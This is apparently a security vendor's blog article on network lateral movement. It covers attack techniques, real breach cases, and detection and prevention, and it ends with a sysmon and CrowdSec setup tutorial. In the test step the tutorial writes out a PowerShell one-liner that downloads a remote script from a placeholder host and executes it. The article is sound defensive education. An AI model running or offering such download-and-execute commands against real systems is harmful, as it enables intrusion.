When we think about cyberattacks, we generally think of a hacker breaching a system and stealing data in one quick action. But in reality, most modern attacks are far more deliberate and sophisticated. 

Once an attacker gains access to your network, they won’t stop there. Instead, they use that access to move deeper, explore the network, and escalate their control. It’s a methodical process called lateral movement, and it’s how attackers turn a small foothold into a full-blown compromise.

In this article, we’ll explain in detail what is lateral movement, why attackers use it, how it works, and how to detect and prevent it. 

What is lateral movement?

Lateral movement refers to the techniques attackers use to move deeper into a network after their initial breach. The goal is to explore and exploit systems, gain higher levels of access, and establish persistence. 

Unlike the initial entry point, lateral movement enables attackers to get into different systems, access sensitive data, and compromise the entire network.

overview of lateral movement, common techniques, how to detect and prevent it

Why attackers use lateral movement

Attackers use lateral movement for three primary reasons.

  • Escalate privileges and higher levels of access to control more systems.
  • The ultimate goal is often financial, operational, or personal information.
  • Attackers try to make their presence permanent, even if the breach is discovered and initial access points are secured.

Unlike the initial breach, which might rely on luck or a single weak spot, lateral movement requires strategy and stealth. Attackers use various tools and techniques to blend in and avoid detection, often mimicking legitimate user behavior.

Techniques used in lateral movement

Attackers rely on specific techniques to move across systems, depending on your network’s structure and security measures in place. These tactics are designed to exploit both technical weaknesses and human behavior.

Let’s dig a little deeper into the most common techniques used in lateral movement.

Credential theft and reuse

One of the simplest ways to move laterally is by stealing user credentials. Attackers may trick employees into revealing their usernames and passwords through phishing emails, or they might install keylogging malware to capture what people type. 

Once they have a valid login, they use it to access other systems.

This technique works especially well in environments where passwords are reused across multiple systems, accounts have more privileges than necessary, or multi-factor authentication isn’t enforced.

Pass-the-hash attacks

Not all credentials are stored as plain text. Many systems use hashed passwords, which are secure, encrypted versions of the password. However, attackers can bypass the need to crack these hashes. 

In a pass-the-hash attack, they use the hashed value itself to authenticate with other systems. This is very effective in Windows environments where older authentication protocols may still be in use.

Remote services exploitation

Remote access tools like Remote Desktop Protocol (RDP), Windows Management Instrumentation (WMI), or Secure Shell (SSH) are very important for IT teams in managing systems.

Unfortunately, they’re also a favorite tool for attackers. By exploiting vulnerabilities in these services or using stolen credentials, attackers can connect to and control systems across your network.

Exploitation of vulnerabilities

Every unpatched system in your network is a potential doorway for attackers. Exploiting vulnerabilities in outdated software is one of the easiest ways for attackers to spread laterally. 

Tools like Metasploit allow attackers to automate this process, quickly identifying and exploiting weaknesses.

Living Off The Land technique

Rather than introducing external tools that might raise alarms, attackers mostly use legitimate tools already present within your network, known as the Living Off The Land (LOTL) technique. PowerShell and PsExec are commonly used as part of this technique. 

PowerShell is a powerful scripting language used for administrative tasks, while PsExec is a utility for executing processes on remote systems. LOTL techniques allow attackers to blend into legitimate activity, complicating your detection efforts even further.

Phases of lateral movement

Lateral movement generally happens in five key phases. 

key phases of lateral movement

1. Initial access

This is the entry point into the network and attackers employ various methods to gain access.

  • Tricking users into clicking malicious links or downloading infected files. Targeting weaknesses in software, systems, or exposed services.
  • Using login details obtained through prior breaches or social engineering.

Worth noting here is the existence of certain cybercriminal groups, like the Lapsus$ group, who, in the past, openly tried to recruit disgruntled employees who would provide initial access in exchange for money.

The goal at this stage is to establish a foothold, often on a single endpoint or user account.

2. Discovery

After entering the network, attackers begin to map its structure. This phase involves locating file servers, databases, or systems containing sensitive data, searching for accessible services and systems, and identifying privileged accounts to target.

Attackers use legitimate tools such as Nmap, Netstat, or built-in commands to gather this information without raising any alarms.

3. Escalation of privileges

Privilege escalation is critical for attackers to move beyond the limitations of their initial access to your system. Some of the common methods include taking advantage of weak or improperly applied access controls, using brute force or dictionary attacks, and exploiting flaws in operating systems or applications to elevate privileges.

Once they obtain administrator-level access, attackers gain greater control over the network.

4. Lateral movement

This phase is when attackers move between systems within your network to achieve their objectives. They usually achieve that by logging into multiple systems with stolen or compromised credentials, authenticating with hash values instead of plaintext passwords, or misusing tools like RDP or WMI to connect to additional systems.

Stealth is critical during lateral movement, as attackers aim to avoid detection while expanding their reach.

5. Persistence

To ensure they can maintain access, attackers plant mechanisms for persistence. Installing backdoors or remote access tools, creating unauthorized accounts with administrative privileges, or modifying system configurations to avoid detection are some of the most common techniques used during this phase.

These measures allow attackers to return even if their initial breach is discovered and addressed.

Consequences of successful lateral movement

Lateral movement is often the turning point that amplifies the damage attackers can cause. Successfully moving through your network, attackers gain access to your most valuable systems and data, leaving your organizations with far-reaching consequences. 

Data breaches and theft of sensitive information

When attackers successfully move laterally, they can access and exfiltrate sensitive data stored deep within your network, including personally identifiable information (PII), financial records, and login credentials, proprietary designs, research data, or trade secrets, and, of course, emails or confidential documents.

Data breaches not only lead to direct financial losses but also result in legal fines and regulatory penalties. For example, under the GDPR in Europe or CCPA in California, organizations can face millions of dollars in penalties for failing to protect sensitive data. 

To put these consequences into context, let’s look at some real-world examples.

The SolarWinds breach in 2020 is one of the most sophisticated examples of lateral movement in recent years. Attackers compromised SolarWinds’ Orion software update mechanism, allowing them to distribute malicious updates to thousands of customers. Once inside the networks, the attackers moved laterally to access sensitive data, including emails and internal documents, from high-profile organizations like Microsoft, the U.S. Department of Homeland Security, and FireEye. The SolarWinds breach perfectly highlights the risks of supply chain attacks and the ease with which attackers can move laterally across interconnected systems.

In another example from 2021, T-Mobile suffered a breach where attackers used lateral movement to access customer data, including names, Social Security numbers, and driver’s license information, affecting over 50 million individuals. The breach resulted in multiple class-action lawsuits and a $350 million settlement, along with significant reputational damage.

Compromise of critical systems and infrastructure

When attackers compromise critical systems, they can disrupt operations, causing downtime and financial losses. 

In industries like healthcare or utilities, this can have life-threatening implications. Looking at real-world examples here, unfortunately, we have no shortage of incidents. 

The Colonial Pipeline ransomware attack in 2021 is the prime example of lateral movement leading to the compromise of critical infrastructure. Attackers used stolen credentials to access the network and then moved laterally to deploy ransomware on critical systems. This forced the company to shut down its pipeline operations, causing fuel shortages across the U.S. East Coast and resulting in a $4.4 million ransom payment. 

Also in 2021, JBS Foods, one of the world’s largest meat processing companies, fell victim to a ransomware attack that involved lateral movement across its network. The attackers disrupted operations in the U.S., Australia, and Canada, forcing the company to shut down production facilities. JBS paid an $11 million ransom to restore operations, highlighting the vulnerability of critical supply chains to lateral movement attacks.

While slightly older, the Norsk Hydro attack of 2019 remains a relevant example. The aluminum manufacturer was hit by the LockerGoga ransomware, which spread laterally across its network, forcing the company to shut down production and switch to manual operations. The attack caused an estimated $40 million in losses and disrupted global aluminum supplies.

Financial losses and operational disruptions

The financial toll of lateral movement is significant and multifaceted.

Successful lateral movement can cause expenses related to containing the breach, such as hiring forensic investigators, legal counsel, and incident response teams. Also, operational downtime often results in halted sales, missed deadlines, and dissatisfied customers. Regulatory penalties, as mentioned earlier, are compounded by potential class-action lawsuits from affected customers or partners.

For small and medium-sized businesses, these costs can be devastating, sometimes leading to bankruptcy. Even larger enterprises can feel the strain.

Two real-world incidents from 2021 we should mention here are the Kaseya and the Acer ransomware attacks

The Kaseya ransomware attack involved lateral movement through the company’s VSA software, which is used by managed service providers (MSPs). The attackers, affiliated with the REvil ransomware group, encrypted the systems of over 1,500 businesses worldwide. The incident caused widespread operational disruptions and financial losses, with Kaseya eventually obtaining a universal decryption key to help affected customers recover.

Acer was also hit by a ransomware attack where attackers demanded a record-breaking $50 million ransom. The attackers used lateral movement to compromise Acer’s systems and exfiltrate sensitive data. While Acer did not confirm whether it paid the ransom, the attack highlighted the growing financial risks associated with lateral movement.

Reputational damage and loss of customer trust

Beyond fines, the loss of customer trust often translates into reduced revenue as clients take their business elsewhere.

Public perception can make or break a company, especially in the wake of a cyberattack. When news of a breach spreads, customers, partners, and stakeholders begin to question the organization’s commitment to security. 

The effects are particularly pronounced when the breach involves the mishandling of sensitive data, there are delays in notifying customers or regulators, or when competitors manage tp capitalize on the breach to gain market share.

For many organizations, reputational damage outlasts the technical and financial impacts of an attack, highlighting the importance of proactive measures to prevent lateral movement.

In September 2022, no other than the giant Uber suffered a breach where an attacker gained access to its internal systems using stolen credentials and then moved laterally to access sensitive data, including internal communications and customer information. The breach raised concerns about Uber’s security practices and led to renewed scrutiny from regulators and customers.

Last but not least, in November 2021, Robinhood disclosed a breach where attackers used social engineering to gain access to its systems and then moved laterally to access customer data, including names, email addresses, and phone numbers. While no financial data was stolen, the breach damaged Robinhood’s reputation, which was already under scrutiny following the GameStop trading controversy earlier that year.

Detecting and preventing lateral movement

While the lateral movement is designed to evade detection, you can identify and stop it if you employ a few active strategies.

Detection techniques

Detecting lateral movement requires you to focus on unusual activity within your network. 

Monitoring network traffic can help detect unusual patterns, such as data transfers to unfamiliar destinations or repeated login attempts from unexpected locations, can signal lateral movement. Anomalies like accessing systems at odd hours or from previously unseen IP addresses are also indicators of a breach.

Correlating events using SIEM tools can help you identify suspicious behaviors that may otherwise go unnoticed, such as multiple failed login attempts followed by successful ones. Security Information and Event Management (SIEM) platforms aggregate logs from various devices, including servers, endpoints, and firewalls, providing a centralized view of network activity. 

Employing behavioral analysis is another technique that can help security teams detect threats even when attackers use legitimate credentials to move laterally. Solutions like the CrowdSec Security Engine analyze user behavior, flagging anomalies such as a standard user account suddenly accessing administrative resources.

Deploying honeypots like decoy systems or files can also lure attackers away from real assets. Interactions with these decoys can provide early warning of lateral movement.

Prevention strategies

The best defense against lateral movement is to stop it before it starts. Prevention focuses on reducing an attacker’s ability to navigate the network or gain the access they need.

Network segmentation is critical here. Networks should be divided into smaller, isolated segments so that critical systems like servers and databases remain segregated from employee workstations. Micro-segmentation takes this a notch higher, creating secure zones within each segment to restrict movement even more tightly.

Use the principle of least privilege to limit user and system access to only what is necessary for their roles. For example, an employee in marketing should not have access to financial systems. Regularly review permissions to ensure they remain appropriate.

As attackers frequently exploit vulnerabilities in outdated software, regular updates and patching is mandatory. Implementing a robust patch management process ensures these weaknesses are addressed promptly. Prioritize critical updates that close known exploits, especially in systems that are part of your network’s infrastructure.

Another handy tool in your fight against lateral movement is the adoption of Endpoint Detection and Response (EDR) tools that monitor endpoints like laptops, desktops, and servers for suspicious activity. They can detect threats such as credential dumping or unauthorized file access. EDR solutions can stop lateral movement before it escalates as they respond to threats in real time.

Regular penetration testing can also help you avoid devastating incidents. Simulated attacks can help identify vulnerabilities and areas where attackers might move laterally. Penetration tests not only reveal technical gaps but also evaluate your team’s ability to detect and respond to real threats.

And let’s not forget the critical impact proper employee training and awareness can have on effectively preventing lateral movement. Employees are often the first line of defense. Regularly educate them about common attack methods, such as phishing, and the importance of strong passwords. Simulated phishing campaigns can test employees’ ability to spot suspicious emails and reinforce training.

Detecting lateral movement using an IDPS

Now that you are familiar with the fundamentals of lateral movement, let’s put theory into practice and see how you can successfully detect lateral movement. 

For this short tutorial, we will be using the CrowdSec Security Engine, CrowdSec’s behavior-based IDPS in a Windows envornment. Since version 1.6.4, the Security Engine can detect lateral movement thanks to the windows_proc_creation collection


This collection contains scenarios that were imported from the SigmaHQ project.

Those scenarios focus on detecting strange or anomalous process creation on a Windows machine (e.g., a mimikatz process has been created, or a lolbin has been executed).

Configuring sysmon

The Security Engine relies on sysmon to detect new process creation. Sysmon is a very powerful tool, and for the sake of simplicity, we’ll use an already-existing configuration created by the community.

After downloading sysmon and extracting the archive, you’ll need to run it from an admin shell.


.\Sysmon64.exe -i -accepteula -c \path\to\sysmonconfig-export.xml

Warning: Once sysmon has been started for the first time, you will not be able to stop it, and it will start automatically on boot. The only way to disable it is to fully uninstall it.

Installing the Crowdsec Security Engine

To install the Security Engine on Windows, go to our release page, download, and run the MSI installer.

You’ll need to update the default configuration for the Security Engine to watch the logs generated by sysmon, in particular, the process creation logs. Edit the acquisition config in %PROGRAMDATA%\CrowdSec\config\acquis.yaml, and add the following:


source: wineventlog
pretty_name: sysmon
event_channel: "Microsoft-Windows-Sysmon/Operational"
event_ids:
 - 1
labels:
 type: sysmon

You’ll now need to install the windows_proc_creation collection to add the scenarios in the Security Engine from an admin shell.


cscli.exe collections install sigmaqh/windows_proc_creation

This will download and enable all the scenarios and sysmon parser from the collection.

Finally, you need to configure the Security Engine to notify us when a suspicious process is created. To do this, use the built-in notification capabilities of the Security Engine — for this example, we’ll be using the Slack notification plugin.

First, you need to configure your profiles to send a notification when a process creation is detected. In %PROGRAMDATA\CrowdSec\config\profiles.yaml, add this snippet at the end:


---
name: sysmon_slack_notif
filters:
 - Alert.Remediation == false && Alert.GetScope() == "ParentProcessId"
on_success: break
notifications:
 - slack_default

Note that we are filtering on the ParentProcessId scope, which is explicitly set by the various sysmon scenarios.

You now need to configure the Slack plugin itself. You’ll need a new template, and to set your slack webhook URL. Edit %PROGRAMDATA\CrowdSec\config\notifications\slack.yaml with the following content:


type: slack           # Don't change
name: slack_default   # Must match the registered plugin in the profile
log_level: info
format: |
  {{range . -}}
  {{$alert := . -}}
  Detected suspicious execution on machine '{{$alert.MachineID}}': {{$alert.GetScenario}}
  User: {{ index (GetMeta $alert "User") 0  }}
  Directory:  {{ index (GetMeta $alert "CurrentDirectory") 0  }}
  Command Line:  {{ index (GetMeta $alert "CommandLine") 0  }}
  Parent Process: {{ index (GetMeta $alert "ParentImage") 0  }} (PID: {{$alert.GetValue}})
{{end -}}

webhook: https://hooks.slack.com/services/XXXXXXXXX

Finally, restart the Security Engine from an admin shell:


Service-Restart crowdsec

Time for testing!

Now, you just have to trigger one of the scenarios to make sure everything is working.To keep things simple for this example, we’ll just attempt to download a ps1 file and then execute it with PowerShell.


 powershell.exe "(New-Object Net.WebClient).DownloadString('https://XXXX/foo.ps1') | IEX;RunBadCommand"

As soon as this command runs, the Security Engine will log an alert, as seen below.

A notification will also be sent to the Slack webbook.

And you are all set! 

You will now be notified of any lateral movement attempt, helping you preemptively block malicious actors before they can do any serious damage. Simple, isn’t it?

CrowdSec IDPS to the Rescue!

Detect lateral movement with CrowdSec’s behavior-based IDPS.

Get started

References and further reading